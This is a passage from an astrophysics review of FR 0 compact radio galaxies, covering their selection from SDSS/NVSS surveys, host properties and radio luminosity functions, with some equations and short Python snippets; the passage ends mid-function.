'low-luminosity' RLAGN. A milestone in the comprehension of the RLAGN phenomenon is the work by Best et al. (2005), which selected the largest complete sample of low-luminosity RGs (\(\lesssim 10^{41}\,\mathrm{erg\,s}^{-1}\)) by cross-matching the Sloan Digital Sky Survey (SDSS, York et al. 2000), the National Radio Astronomy Observatory (NRAO) Very Large Array (VLA) Sky Survey (NVSS, Condon et al. 1998), and the Faint Images of the Radio Sky at Twenty centimeters survey (FIRST, Becker et al. 1995) with flux densities \(>5\) mJy at 1.4 GHz. This flux-density cut is much lower than that of, e.g., the 3C catalogue (178 MHz flux density \(>9\) Jy, Bennett 1962), on which most of our comprehension of the radio-AGN phenomenon is based. The most interesting result from the radio-optical survey is that their radio morphology appears unresolved at the scale of the FIRST radio maps, i.e. \(5^{\prime\prime}\), which corresponds to 10-20 kpc at \(z<0.3\). These compact RGs, later named _FR 0s_, which belong to a heterogeneous population of LERG-type red massive ellipticals, represent the bulk of the RG population of the local Universe with a space density \(>100\) times higher than 3C/RGs. The study of the FR 0 population plays a relevant role in modern astrophysics because: i) since they are the most common RLAGN in the local Universe, their comprehension provides an important insight into the accretion-ejection mechanism of ordinary RGs; ii) since their radio emission is on galactic scale, their jets can have a tremendous impact on the galaxy evolution in the context of radio-mode feedback. In this review, we provide an overview of the observational properties and theoretical understanding of this interesting class of compact RGs, the FR 0s. We introduce the class of CRSs in Sect. 2 and then focus on the FR 0s (Sect. 3), by discussing their selection (radio and host properties). Then we derive the radio luminosity function of local RGs to demonstrate the abundance of FR 0s with respect to the FR I/IIs (Sect. 4). Then we review their multi-band properties from radio (Sect. 5), optical and IR (Sect. 6) to high energy bands (Sect. 7) to picture their typical spectral energy distribution (SED). 
A discussion of the accretion-ejection coupling (Sect. 8), environmental properties (Sect. 9) and their role of compact sources in AGN feedback (Sect. 10) lead to drawing static and dynamic scenarios to account for the multi-band properties of FR 0s in relation to the other FR classes (Sect. 11 and 12). A final chapter on future perspective is also included (Sect. 13). We adopt in this work \(H_{0}=70\) km s\({}^{-1}\) Mpc\({}^{-1}\), \(\Omega_{m_{0}}=0.3\), \(\Omega_{A_{0}}=0.7\). ## 2 Compact radio sources In this review we consider CRSs, those AGN which appear unresolved at small angular sizes (\(\lesssim\) a few arcseconds). CRSs can be RQ or RL, and here we will focus on the latter. In RL CRSs, the compact component is generally ascribed to the radio core, which is interpreted as non-thermal self-absorbed synchrotron emission from the base of a relativistic jet, that extracts energy from the spinning BH and/or the accretion disc (Blandford and Znajek, 1977; Blandford and Payne, 1982). The connection between the compact core emission and the pc-kpc-Mpc scale extended jet emission, has been discussed in previous reviews (e.g., Condon and Dressel 1978; O'Dell 1978; Kellermann 1980; Kellermann and Pauliny-Toth 1981; O'Dea 1998; Falcke et al. 2004; Lobanov 2006; Tadhunter 2016b; O'Dea and Saikia 2021), which all gather increasing evidence of a large population of CRSs in the local Universe. _What does 'compact' mean and what defines the compactness?_ The angular size of a compact source can vary from milli-arcsecond (mas) to a few arcseconds depending on the frequency, resolution and depth of observations. There is no a specific limit on the physical scale for a compact source. The morphological compactness can be defined as the 'unresolved' structure of a radio source, when the deconvolved size is smaller or equal to the radio-map beam width and when its visibility function is flat across the entire spatial-frequency plane. Starting with the Rayleigh-Jeans limit for brightness temperature \(T_{b}\) [K] (Condon and Ransom, 2016), the angular dimension \(\theta\) of a compact source with its peak intensity S\({}_{\nu}\) [mJy beam\({}^{-1}\)] at the frequency \(\nu\) [GHz] is \[\theta\sim 35\;\,S_{\nu}^{1/2}\;\,T_{b}^{-1/2}\;\,\nu^{-1}\;\,arcsec. \tag{1}\] For brightness temperatures above the threshold to discriminate between an AGN and stellar origin (Falcke et al., 2000), \(T_{b}\gg 10^{7}\) K, for a spectral peak frequency between hundreds of MHz to GHz, the angular size varies between a few mas to a few arcseconds. This corresponds to a linear dimension range of several hundreds of pc to kpc in the nearby Universe (\(z<0.3\)). However, in the literature, a CRS is trivially classified as a morphologically point-like source based on the corresponding angular resolution. In theory, a conventional definition of a compact source predicts the presence of a characteristic self absorption in the radio spectrum at low frequencies (below GHz regime). A varying opacity throughout the source entails a spectral characterisation: a flat, inverted or undulating spectrum over a wide range of frequencies due to the superposition of several radio-emitting partially opaque sources. Both the generally flat-spectrum and the compactness of the source can lead to the interpretation of an unresolved radio-emitting nucleus. A (flat-spectrum) compact radio core can be observed across all types of galaxies and AGN. 
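As a back-of-the-envelope illustration of the compactness scale implied by Eq. (1), the minimal Python sketch below evaluates the angular size for an AGN-like brightness temperature; the function name and the example numbers (a 5 mJy beam\({}^{-1}\) peak at 1.4 GHz with \(T_b=10^{7}\) K) are purely illustrative.

```python
import math

def max_angular_size_arcsec(peak_mJy_per_beam, Tb_K, nu_GHz):
    """Angular size from Eq. (1): theta ~ 35 * S^(1/2) * Tb^(-1/2) / nu [arcsec],
    with the peak intensity S in mJy/beam, Tb in K and nu in GHz
    (Rayleigh-Jeans regime)."""
    return 35.0 * math.sqrt(peak_mJy_per_beam) / (math.sqrt(Tb_K) * nu_GHz)

# A 5 mJy/beam source at 1.4 GHz with the minimum AGN-like brightness
# temperature (Tb ~ 1e7 K) is limited to ~18 mas; higher Tb (or lower
# flux density) pushes the implied angular size to even smaller scales.
print(max_angular_size_arcsec(5.0, 1e7, 1.4))   # ~0.018 arcsec
```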
Even normal spiral, star forming galaxies, RQAGN and late-type galaxies (LTG) in general can reveal a compact nucleus, whose radio origin is thermal and non-thermal emission from several physical processes (Condon, 1992; Panessa et al., 2019). Since the most radio-loud AGN are preferentially hosted by bulge-dominated evolved galaxies with masses larger than \(10^{11}\,M_{\odot}\) and much less signs of morphological disturbance (spirals, bars) and SF than RQAGN (e.g. Best et al. 2005a; Ho 2008; Best and Heckman 2012; Koziel-Wierzbowska et al. 2017b, a; Magliocchetti 2022), a prior selection of the optical hosts, ETGs rather than LTGs, can help to exclude RQAGN from genuine RL CRS samples at the cost of completeness in the RLAGN population. The presence of an arcsec-scale compact radio emission at the centre of ETGs has been affirmed since '70s as the main results of shallow VLA radio surveys up to now (e.g. Rogstad and Ekers 1969; Heeschen 1970; Ekers and Ekers 1973; Kellermann and Pauliny-Toth 1981; Sadler 1984; Fanti et al. 1986, 1987; Wrobel and Heeschen 1991; Slee et al. 1994; Giroletti et al. 2005; Capetti et al. 2009; Nyland et al. 2016; Hardcastle et al. 2019; Roy et al. 2021; Grossova et al. 2022; Wojtowicz et al. 2023; Capetti and Brienza 2023). More massive galaxies and earlier in type appear to be more probably connected to the presence of a RLAGN (e.g., Smith et al. 1986; Best et al. 2005a; Floyd et al. 2010; Kim et al. 2017; Zheng et al. 2020), able to launch from the weakest to the most powerful jets in the Universe (large range of luminosities, morphologies, duty cycles and speeds, e.g. Heckman and Best 2014; Morganti 2017; Morganti et al. 2021a; Saikia 2022). Hosted in ETGs, RL CRSs have been classified based on radio spectral and morphological properties. Other than blazars which have a large intrinsic radio size but appear compact because of projection effects and are affected by relativistic beaming (one-sidedness, superluminal motions, and high brightness temperatures), misaligned RL CRSs (Readhead et al., 1994; O'Dea, 1998; Orienti, 2016; O'Dea and Saikia, 2021) have been studied mainly at high powers (\(L_{1.4\,\mathrm{GHz}}>10^{25}\,\mathrm{W}\,\mathrm{Hz}^{-1}\)) and are characterised by a convex synchrotron radio spectrum: the peak position around 100 MHz in the case of compact-steep spectrum (CSS) sources (well determined only by LOFAR and MWA observations in the recent years, e.g. Mahony et al. 2016; Callingham et al. 2017; Slob et al. 2022), and at about 1 GHz in the case of GHz-peaked spectrum (GPS) sources, or even up to a few GHz in the sub-population of high frequency peakers (HFP) (Fanti et al., 1985; Spencer et al., 1989; Stanghellini et al., 1998; Snellen et al., 1998; Dallacasa et al., 2000; Kunert et al., 2002; Orienti et al., 2007; Hancock et al., 2010) (Fig. 1). Morphologically, lobes and/or hot spots are typically resolved with very-long baseline interferometry (VLBI) observations and a weak component hosting the core is occasionally present (e.g. Wilkinson et al. 1991; Gugliucci et al. 2005; An et al. 2010, 2012; Wu et al. 2013). Depending on their size, CSS/GPS may be termed as compact symmetric objects (CSO) if they are smaller than 1 kpc, or medium-sized symmetric objects (MSO) if they extend up to 10 - 15 kpc (Conway, 2002; Fanti et al., 2001). The existence of a relation between the rest-frame peak frequency and the projected linear size (e.g. 
O'Dea and Baum 1997) indicates that the mechanism responsible for the curvature of the spectrum is the youth: these sources are small because they are still in an early stage of their evolution, and will develop into FR I/II sources (e.g., Phillips and Mutel 1982; Fanti et al. 1990; Snellen et al. 2000; An and Baan 2012). The alternative scenarios point to a dense medium which might limit and frustrate the jet growth (van Breugel et al., 1984; Carvalho, 1994, 1998; Ghisellini et al., 2004; Giroletti et al., 2005), or to a short or recurrent activity due to occasional BH accretion (Readhead et al., 1994; Gugliucci et al., 2005; Kunert-Bajraszewska et al., 2010, 2011; An and Baan, 2012; Kiehlmann et al., 2023). In conclusion, the CRS category can embrace a large population of radio-emitting sources: RQAGN, star-forming galaxies, blazars, young RGs and the FR 0s. In the next section, we will focus on the properties of this 'new' class of compact RGs, FR 0s, in relation to the large-scale RLAGN population. ## 3 Low-luminosity CRSs: the FR0s A significant fraction of nearby galaxies shows evidence of weak nuclear activity unrelated to normal stellar processes. Recent high-resolution, multi-wavelength observations indicate that this activity derives from BH accretion with a wide range of accretion rates and is associated with a CRS (e.g., Nagar et al. 2005; Ho 2008; Zuther et al. 2012; Saikia et al. 2018; Williams et al. 2022, 2023). In fact, moving to lower luminosities generally corresponds to selecting AGN with smaller and weaker jet (compact) structures and flatter radio spectra (e.g., Nagar et al. 2005; Sadler et al. 2014; Baldi and Capetti 2010; Gurkan et al. 2018; Sabater et al. 2019; Hardcastle et al. 2019; Dabhade and Gopal-Krishna 2023), but with an increasing contribution from spurious RQAGN (Mezcua and Prieto, 2014; Bonzini et al., 2013; Baldi et al., 2021). Current radio surveys of the local Universe have unearthed a large population of low-luminosity AGN (LLAGN, with bolometric luminosities \(\lesssim\)\(10^{40}\,{\rm erg\,s^{-1}}\)), which were poorly explored in the past. Best and Heckman (2012), up-dating the sample of Best et al. (2005), select 18,286 RGs (the SDSS/NVSS sample, hereafter), with low powers (\(L_{1.4\,{\rm GHz}}<10^{24}\,{\rm W\,Hz}^{-1}\)) at low redshifts (\(z<0.3\)), whose the majority (\(\sim\)80%) are LLAGN and radio compact (\(5\arcsec\)), with linear sizes \(\lesssim\)10-20 kpc. The role of LLAGN and their compact jet emission in galaxy-BH co-evolution (Ho, 2008; Kormendy and Ho, 2013) is crucial for several aspects: i) since LLAGN outnumber the quasar population by a few orders of magnitudes at \(z<0.3\)(Nagar et al., 2005; Best et al., 2005; Saikia et al., 2018), they provide the snapshot of the ordinary relation between an accreting BH and its host. The absence of an outshining AGN at the galaxy centre allows us to better study the co-evolutionary link between host and BH; ii) since LLAGN reside in less massive galaxies, the identification of LLAGN would help to constrain the occupation fraction of active BH in galaxies at low stellar masses \(>10^{9-10}\,M_{\odot}\)(Greene, 2012; Gallo and Sesana, 2019), and the BH mass density function at \(M_{\rm BH}<10^{8}\,M_{\odot}\). These quantities are fundamental to calibrate the prescriptions for BH-galaxy growth of semi-analytical and numerical models (e.g., Shankar 2009; Barausse et al. 
2017); iii) due to the lack of sensitive surveys in the past, the role of LLAGN in galaxy evolution has been always downgraded with respect to powerful quasars, which by definition can offer a larger energetic budget to the host. Yet, recently the advent of deep radio surveys is reversing our view on AGN activity: LLAGN are always switched on at some level at low radio powers (\(L_{150\,{\rm MHz}}\gtrsim 10^{21}\) W Hz\({}^{-1}\), Sabater et al. 2019) and have galactic-scale jets, that can have a tremendous impact on their hosts by continuously injecting energy into the host, a crucial aspect for the jet-mode (or radio-mode) feedback (Fabian, 2012). While in the optical band the role of LLAGN in BH-galaxy co-evolution and their BH accretion properties have been largely studied (Ho, 2008; Fanidakis et al., 2011), their connection with the radio band has recently started to be explored. The past and current optical-radio studies of radio-emitting LLAGN collect observational evidence that three states of accretion-ejection exist: RQ Seyferts, RQ LINERs and RL LINERs (Low-Ionization Nuclear Emission line Regions, Hine and Longair 1979; Heckman 1980; Kewley et al. 2006), different from the accretion-ejection states at higher luminosities, LERGs and HERGs and RQ quasars4. LINERs have lower accretion rates (\(\dot{m}\)), are usually more radio-loud and reside in earlier type galaxies than Seyferts (Ho, 2008). In fact, LINERs tend to host compact cores (Cohen et al., 1969; Falcke et al., 2000; Filho et al., 2002b; Maoz, 2007), more radio luminous as the BH mass (or galaxy mass) increases (e.g. Laor 2000; Best et al. 2005b; Mauch and Sadler 2007). RQ LINERs and Seyferts exhibit sub-relativistic and not collimated jets (e.g., Ulvestad et al. 1999; Wrobel 2000; Ulvestad and Ho 2001a; Gallimore et al. 2006; Singh et al. 2015b; Baldi et al. 2021b). Conversely, RL LINERs have been generally interpreted as the scaled-down version of powerful RLAGN in terms of accretion and jet luminosities (Chiaberge et al., 2005; Balmaverde and Capetti, 2006a). The nuclei of RL LINERs can be described with a model of synchrotron self-absorbed base of a low-power (mildly) relativistic jet coupled with an underluminous RIAF disc (typically an ADAF, Narayan and Yi 1994b), analogous to FR I/LERG disc-jet coupling (e.g. Balmaverde and Capetti 2006b; Hardcastle et al. 2009). The low-power CRS population selected from the SDSS/NVSS sample (Best and Heckman, 2012) in the same luminosity range (\(\lesssim\)10\({}^{41}\) erg s\({}^{-1}\)) of classical 3C/FR Is includes a heterogeneous population of mostly LINER/LERGs5 with a broad distribution of BH mass and host properties. Footnote 5: LERG and RL LINER are equivalent classes at low luminosities. Baldi et al. (2010) analysed in detail the photometric and spectroscopic properties of the SDSS/NVSS sample to select the bona-fide RLAGN population (see Sect. 3.1). They found that the majority of the SDSS/NVSS sample (\(\sim\) 80%) consists of compact LERGs, that are characterised by a total jet power up to a factor \(\sim\)1000 lower than what expected by RGs with bolometric AGN luminosity similar to those of the 3C/FR Is (\(\sim\) 10\({}^{40}\) erg s\({}^{-1}\)). This remarkable result that the local Universe is dominated by low-luminosity CRSs lacking of substantial extended emission, expresses the need to include these sources in the taxonomy of RGs. 
Ghisellini (2011) for the first time introduced in the literature the name _FR 0_ to characterise a population of weak RL CRSs hosted in ellipticals, named Core Galaxies6 (CoreG), which exhibit radio core and AGN bolometric luminosities similar to the weakest 3C/FR Is (M87), but with an extended radio emission hundreds of times weaker (Baldi and Capetti, 2009). CoreG host genuine'miniature' RGs with LINER-like nuclei, which extend the nuclear luminosity correlations reported for 3C/FR Is by a factor of \(\sim\)1000 toward lower luminosities (Balmaverde and Capetti, 2006a; Kharb et al., 2012): this has been interpreted as a sign of a common central engine (RIAF disc) (Balmaverde and Capetti, 2006a; Kharb et al., 2012). CoreG are characterised by kpc-scale jets and a deficit of total radio emission in analogy to the SDSS/NVSS sample, but at lower radio luminosities. Footnote 6: The Core Galaxy nomenclature comes from the (core-type) optical flat surface brightness profile in innermost region of an ETG (e.g. Faber et al. 1997). In analogy to CoreG, the FR 0 classification (see Sect. 3.1) does not correspond to a pure radio morphological selection of CRSs, but also includes an optical identification (host and AGN properties) to separate the genuine FR 0s which are all RLAGN, from spurious RQAGN and star forming galaxies (bluer LTGs with emission line ratios consistent with Seyfert or SF and steeper radio spectra, Baldi et al. 2016). A closer look at the FR 0s at sub-arcsec/mas scale revealed that the majority still appears radio compact, with a flat spectrum in the GHz band (Baldi et al., 2015, 2019; Cheng and An, 2018; Cheng et al., 2021). However, a small fraction of those exhibits kpc/pc-scale core-brightened jets, suggesting that FR 0s can actually produce collimated structures. The lack of substantially extended radio emission at kpc scale and the spectral flatness for the majority of these CRSs have led to the affirmation of the FR 0 nomenclature as a unique class of genuine compact RGs different from the other RLAGN classes. In conclusion, in the last decade, different parallel studies have brought to light a revolutionary result, i.e. classical 3C FR I/ IIs do not represent Figure 2: Multi-band composite panel of RGs. On the top two examples of typical radio morphologies of a FR I (Cen A, Burns et al. 1983 at 1.4 GHz) and a FR II (3C 285, Alexander and Leahy 1987 at 1.4 GHz). On the bottom, we show an example of FR 0. The left panel displays the r-band SDSS image of the ETG which hosts the FR 0 with the blue VLA 4.5-GHz radio contours (Baldi et al., 2019) (3 kpc scale set by the green arrow). The right panel represents the high-resolution zoom on the radio core (on the scale of 3 pc) provided by the VLBI image from Cheng and An (2018). Image reproduced with permission from Baldi et al. (2019), copyright by the authors. the ordinary picture of the RLAGN phenomenon in the local Universe, but FR 0-like LLAGN represent the bulk of the local RG population (Fig. 2). The paucity of sources with weak extended radio structures in high flux limited samples (such as in the 3C sample) is due to a selection bias, since the inclusion of such objects is highly disfavored. In fact, in support to this interpretation, Baldi and Capetti (2009) showed that the lower flux threshold of B2 sample (\(<\)250 mJy at 408 MHz, Fanti et al. 1978) drastically reduces the selection bias and allows the inclusion of a larger fraction of core-dominated7 galaxies, consistent with being FR 0s. 
Footnote 7: The ratio of core to total extended emission (which in general includes the core emission for simplicity) is called the core-dominance parameter (generally the total and core emission measured, respectively, at 1.4 GHz and \(\gtrsim\)5 GHz). Core-dominated galaxies have typically a core dominance \(\gtrsim 1/3\). ### Selection of FR 0s Disentangling bona-fide FR 0s from the radio compact impostors (blazars, young RGs, RQAGN, compact star-forming galaxies) represents a multi-band selection process. This can be harder at low luminosities (mJy-level at \(z<0.3\)). For example, Best et al. (2005b) used several optical photometric and spectroscopic diagnostics and radio properties to select RLAGN in the SDSS/NVSS sample, however a small fraction (\(\sim\)10%) of a possible RQAGN contribution is still present after the selection. Because aligned and young RGs can be removed from the sample only on the basis of a spectral and temporal radio study which are often not available, the simplest method to select bona-fide FR 0 candidates is based on a shallow optical-radio (largely available) selection process which consists of a few steps to maximise the probabilities that the radio emission is associated with a compact RL active nucleus. Accordingly, Baldi et al. (2018) have compiled a catalogue of 104 FR 0 sources (namely, FR0CAT) from the SDSS/NVSS sample, by adopting the following criteria: * nearby (redshift \(z\lesssim 0.05\)) galaxies. * compact: the sources are unresolved in the NVSS maps at 45\({}^{\prime\prime}\) resolution. More stringently, the source must appear unresolved at FIRST resolution, 5\({}^{\prime\prime}\). The FR 0 candidates consist of unresolved sources for which the deconvolved size is smaller than 4\({}^{\prime\prime}\). At \(z=0.05\) this corresponds to \(\sim\)5 kpc, that is, to a radius of 2.5 kpc. * FIRST 1.4-GHz flux density \(>\) 5 mJy to increase the possibility of an accurate size and flux measurement. This value corresponds to \(\sim\)30 times the noise level of the FIRST maps. * LERGs. Selecting LINERs allows the exclusion of AGN with high-Eddington ratios (generally Seyferts/HERGs) and are more probably associated with RLAGN phenomena (Heckman and Best, 2014; Panessa et al., 2019). Follow-up observations at higher angular resolution than that of FIRST maps are needed to confirm whether the FR0CAT sources still remain unresolved at sub-kpc scale. The resulting FR0CAT sample turns out to be a population of RGs with a core dominance of a factor \(\sim\)30 higher than typical 3C/FR Is (Baldi and Capetti, 2009; Baldi et al., 2019; Whittam et al., 2020), where instead the core typically contributes to 1% to the total radio emission (Morganti et al., 1997). Their 1.4-GHz radio luminosities are in the range \(10^{38}-10^{40}\,\rm erg\,s^{-1}\). These radio selections turned out to include mostly luminous (\(-21\gtrsim M_{r}\gtrsim-23\)) red ETGs with BH masses \(10^{7.5}\lesssim M_{\rm BH}\lesssim 10^{9}\,M_{\odot}\)8. However, only a minor fraction of the selected FR 0s departs from this general behavior (galaxies with optical photometric and spectroscopic characteristics, typical of blue star-forming spirals and RQAGN, see Sect. 3.2), although a host (ETG) selection was not part of the selection criteria. Footnote 8: All the BH masses reported in this work for FR0CAT, FRICAT, sFRICAT and FRIICAT objects are derived from SDSS stellar velocity dispersions \(\sigma\) and considering the M\({}_{\rm BH}\)-\(\sigma\) relation of Tremaine et al. 2002. 
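As a concrete illustration of footnote 8, the sketch below converts an SDSS stellar velocity dispersion into a BH mass through the \(M_{\rm BH}\)-\(\sigma\) relation of Tremaine et al. (2002); the coefficients adopted here (normalisation 8.13, slope 4.02, pivot 200 km s\({}^{-1}\)) are the commonly quoted best-fit values and should be checked against the original paper, and the example dispersions are illustrative.

```python
import math

def black_hole_mass_msun(sigma_kms):
    """M_BH from the M_BH-sigma relation of Tremaine et al. (2002):
    log10(M_BH / Msun) = 8.13 + 4.02 * log10(sigma / 200 km/s)."""
    return 10.0 ** (8.13 + 4.02 * math.log10(sigma_kms / 200.0))

# Dispersions of ~140 and ~330 km/s roughly bracket the FR0CAT
# BH-mass range of 10^7.5 - 10^9 Msun quoted above.
for sigma in (140.0, 200.0, 330.0):
    print(f"sigma = {sigma:5.0f} km/s  ->  M_BH ~ {black_hole_mass_msun(sigma):.1e} Msun")
```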
As control samples with respect to the FR0CAT, other catalogues of low-luminosity FR Is and FR II have been selected from the SDSS/NVSS sample, a factor \(\sim\)10-100 weaker than 3C/RGs. Capetti et al. (2017) selected 219 low-luminosity FR Is, named FRICAT, with core-brightened radio morphology, redshift \(\leq\) 0.15, and extending (at the sensitivity of the FIRST images) to a radius (r) larger than 30 kpc from the optical centre of the host. The authors also selected an additional sample (sFRICAT) of 14 smaller (\(10<\) r \(<\) 30 kpc) FR Is, limiting to \(z<0.05\). The distribution of radio luminosity at 1.4 GHz of the FRICAT covers the range \(10^{39}-10^{41.3}\,\rm erg\,s^{-1}\) and the sources are all LERGs. The hosts of the FRICAT sources are all luminous (\(-21\gtrsim Mr\gtrsim-24\)), red ETGs with BH masses in the range, \(10^{8}\lesssim M_{\rm BH}\lesssim 10^{9.5}\,M_{\odot}\), slightly larger than FR0CAT BH masses (Fig. 3). Similarly, Capetti et al. (2017) selected 122 low-luminosity FR IIs, named FRIICAT, with redshift \(\leq\) 0.15, an edge-brightened radio morphology, and those with at least one of the radio emission peaks located at radius r \(>\) 30 kpc from the optical galaxy center. The radio luminosity at 1.4 GHz of the FRIICAT sources covers the range \(10^{39.5}\) -\(10^{42.5}\,\rm erg\,s^{-1}\). The FRIICAT catalog mostly includes LERGs (90%), which are luminous (\(-20\gtrsim Mr\gtrsim-24\)), red ETGs with BH masses in the range \(10^{8}\lesssim M_{\rm BH}\lesssim 10^{9}\,M_{\odot}\). Other FR 0 samples were selected at lower and higher radio frequencies than the FIRST 1.4-GHz band (see Sect. 5 for details), which instead include a larger contamination from spurious sources than the FR0CAT. At low radio frequencies (hundreds of MHz) which is expected to be dominated by optically-thin emission, the vast majority (\(\sim\)70%) of sources in the wide-area LOFAR (Hardcastle et al., 2019; Sabater et al., 2019; Mingo et al., 2019; Capetti et al., 2020) and GMRT Survey (Capetti et al., 2019), and in the deep well-studied field (e.g. ELAIS-N1 and BOOTES, Sirothia et al. 2009; Ishwara-Chandra et al. 2020) appear compact with an angular resolution of a few arcsec and have \(\alpha\) between 0 and 0.85, with the flat-spectrum sources more abundant than the steep-spectrum companions. At higher radio frequencies (tens of GHz) which is expected to be dominated by the optically-thick emission, FR 0s have been selected by Sadler et al. (2014) from the AT20G-6dfGS sample and by Whittam et al. (2016) from the Cambridge 10C survey (mostly \(z<3\)) based on their radio morphological compactness (a few arcsec). Both the samples selected 70-80% of CRSs, which include FR0-like LERGs and a large fraction of possible GPS/CSS sources. In conclusion, the selection of flat-spectrum weak CRSs in red massive hosts still remains the safest way to select bona-fide FR 0s in relation with other compact and extended radio galaxies which can exhibit steeper radio spectra and bluer hosts (see next section). ### Host properties The different radio-frequency selections of the FR 0s lead to a heterogeneous distribution of their host properties (e.g. galaxy type, colour, mass, \(M_{\rm BH}\)): selecting red massive ETGs represents the most secure criterion of identifying hosts of a FR 0. In fact, a prior host selection through several diagnostics can reduce the probability of inclusion of radio-compact impostors. 
The concentration index \(C_{\rm r}\) is defined as the ratio of the galaxy radii including 90% and 50% of the light in the r band, respectively. ETG have higher values of concentration index than LTG, i.e. \(C_{\rm r}>2.6\)(Strateva et al., 2001). The Dn(4000) spectroscopic index is defined as the ratio between the flux density measured on two sides of the Ca II break (\(\sim\)4000 A) (Balogh et al., 1999) and high values, Dn(4000) \(>1.7\), are generally associated with old stellar populations (\(\gtrsim 1\) Gyr, Hernan-Caballero et al. 2013) and, hence, with red passive galaxies (Best et al., 2005a; Capetti and Raiteri, 2015). Optical and infrared colour can also separate red ellipticals from blue spirals. The combination of these diagnostics with the FR0CAT criteria listed in Sect. 3.1 allows to identify the radio-compact red massive ETGs which have the highest probabilities of hosting a RLAGN. Figure 3: Left panel: BH mass distribution (in M\({}_{\odot}\)) of FR 0s (FR0CAT, blue line) with respect to FR Is (FRICAT, radio size \(>30\) kpc, black line) and small FR Is (sFRICAT, \(10<\) radio size \(<30\) kpc, red line). Right panel: compact (black) and extended RGs (green), when matched in radio core luminosities. Images reproduced with permission from [left] Baldi et al. (2018), copyright by ESO; and from [right] Miraghaei and Best (2017), copyright by the author(s). The vast majority of the FR0CAT, FRICAT and FRIICAT hosts are indistinguishable: red massive ETGs, based on the values of the \(C_{r}\), spectroscopic Dn(4000) indices and broad-band colour. Their redness is confirmed by the photometric \(u-r\) colour, measured over the whole galaxy. The WISE infrared colours further support the general passive nature of the FRCAT hosts (Fig. 4, W1-W2 \(<\) 0.2, Wright et al. 2010). Nonetheless, a few galaxies of the FR0CAT extend to redder colours than those from the FRICAT and there is a notable lack of blue host galaxies (\(u-r>2.5\)) with respect to the general population of ETGs (Schawinski et al., 2009). In addition, the galaxy mass (and BH mass) of FR0CAT sources is on average smaller than those of FRICAT galaxies by a factor \(\sim\)1.4 (Fig. 3), a possible effect of the selection of their lower radio luminosities since radio power and host mass are found to correlate in RL AGN (e.g. Best et al. 2005a; Capetti and Brienza 2023). At high frequencies, Sadler et al. (2014) did not opt for a host selection and, in fact, found that the host galaxies of FR 0s display heterogeneous properties with a wide range in WISE colours, (33% in LTGs with some ongoing SF, see Fig 4). This implies that the selected FR 0 candidates, which make up the majority of the AT20G-6dFGS sample, probably consists of a mixed bag of genuine FR 0s, young RGs and RQAGN. In fact, the bluer colour of the Figure 4: WISE colour-colour plot (W2-W3 vs. W1-W2) for the host galaxies of FR I (red squares), FR II (blue squares) and compact (FR 0, black crosses) radio sources in the 20 GHz AT20G-6dFGS sample from Sadler et al. (2014). The horizontal line at a \(3.4-4.6\mu\)m colour of 0.6 mag divides the AGN and normal galaxy populations. Objects where radiation from an AGN dominates the galaxy spectrum in the mid-infrared are expected to lie above this line, and objects where starlight dominates should lie below the line. The vertical line W2-W3 \(>\)2 identifies LTGs from ETGs. Image reproduced with permission from Sadler (2016), copyright by Wiley-VCH. 
selected FR 0s is generally attributed to galaxies with a recent SF burst or to young RGs in gas-rich environments. Since the radio core luminosity has been argued to be a better gauge of jet power than total radio luminosity9, Miraghaei and Best (2017) matched a sample of RL CRSs and extended RGs on the basis of the core luminosities. In terms of host properties, they found that CRSs and extended RGs differ only in the BH mass (Fig. 3), similar to the result from the FR0CAT (Baldi et al., 2018). Footnote 9: The radio core power is a measure of instantaneous power, rather than the total radio power, that is an averaged value over time and is also influenced by environment. The combination of the following criteria, i.e. the optical red colour, radio compactness and low radio powers (in mJy-level radio surveys), allows to increase the chances to exclude radio-compact impostors and select mostly massive ETGs which harbour compact RL LLAGN, \(<\)10\({}^{23}\) W Hz\({}^{-1}\)(Best et al., 2005; Sabater et al., 2019; Hardcastle et al., 2019), consistent with a FR 0 classification. Figure 5: The local NVSS luminosity function at 1.4 GHz for RLAGN (pink diamonds) and LERGs (empty squares) from the SDSS/NVSS sample (Best and Heckman, 2012). The lower x-axis is expressed in erg s\({}^{-1}\) and the upper one in W Hz\({}^{-1}\). The other points represent the radio luminosity functions for FR 0s (filled circles), small FR Is (empty red up-warded triangles), FR Is (filled red triangles) and FR IIs (blue filled down-warded triangles) from the FR0CAT (Baldi et al., 2018), sFRICAT/FRICAT (Capetti et al., 2017) and FRICAT (Capetti et al., 2017). The dot, dashed and dot-dashed lines are rough fits of the data-points, respectively, for FR 0s, FR Is, and FR IIs, to better visualize the luminosity functions. ## 4 Radio luminosity function We calculate the radio luminosity functions of the FRCAT sources as object density per unit logarithmic luminosity interval within the maximum volume \(V_{\rm max}\) in which the objects would be observed (Schmidt, 1968; Condon, 1989): \[\Phi\left(\log L_{\rm NVSS}\right)=\frac{4\pi}{\sigma}\sum_{i=1}^{N(\log L_{*} )}\frac{1}{V_{\rm max(i)}}\,, \tag{2}\] where \(\sigma\) is the area of the sky surveyed, \(N\left(\log L_{*}\right)\) is the number of objects in a given NVSS luminosity bin \(L_{*}\), and \(V_{\rm max(i)}\) is given by the limiting magnitudes/fluxes in both the optical and radio properties of the sample, namely a radio cutoff of 5 mJy and SDSS optical cutoff of \(r<18\), as well as any imposed redshift limit for the analysis (\(z<0.05\) for FR0CAT and sFRICAT and \(z<0.15\) for FRICAT and FRIICAT). The sky area of the overlapping region between the SDSS DR7 spectroscopic survey and the FIRST/NVSS radio survey is \(\sigma=2.17\) steradians. We place detected sources in bins of equal radio luminosities and estimate the uncertainties as in Condon (1989). We use Poisson statistics to estimate uncertainties in luminosity bins with small numbers of sources (\(N<7\)). If \(N=1\), we set 1\(\sigma\) upper limit on the luminosity function in that bin. The 1.4-GHz NVSS luminosities functions are derived for the FR 0s, FR Is and FR IIs from the FRCAT in Fig. 5 and tabulated in Table 2. Figure 5 shows that, as expected, FR 0s dominate the radio source population at relatively low radio luminosities \(\lesssim 10^{23.5}\) W Hz\({}^{-1}\), while the FR Is and FR IIs dominate at the highest luminosities. 
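For concreteness, a minimal sketch of the binned \(1/V_{\rm max}\) estimator of Eq. (2) is given below. It assumes the per-source all-sky maximum volumes (set jointly by the 5 mJy radio cut, the \(r<18\) optical cut and the redshift limit) have already been computed; the function name and the default bin edges (chosen to match Table 2) are illustrative.

```python
import numpy as np

def luminosity_function(logL, vmax_allsky, sky_area_sr=2.17,
                        bin_edges=np.arange(38.0, 42.8, 0.4)):
    """Binned 1/Vmax estimator of Eq. (2).

    logL        : log10 of the 1.4-GHz luminosity [erg/s], one entry per source
    vmax_allsky : all-sky maximum volume [Mpc^3] within which each source would
                  still satisfy the radio, optical and redshift limits
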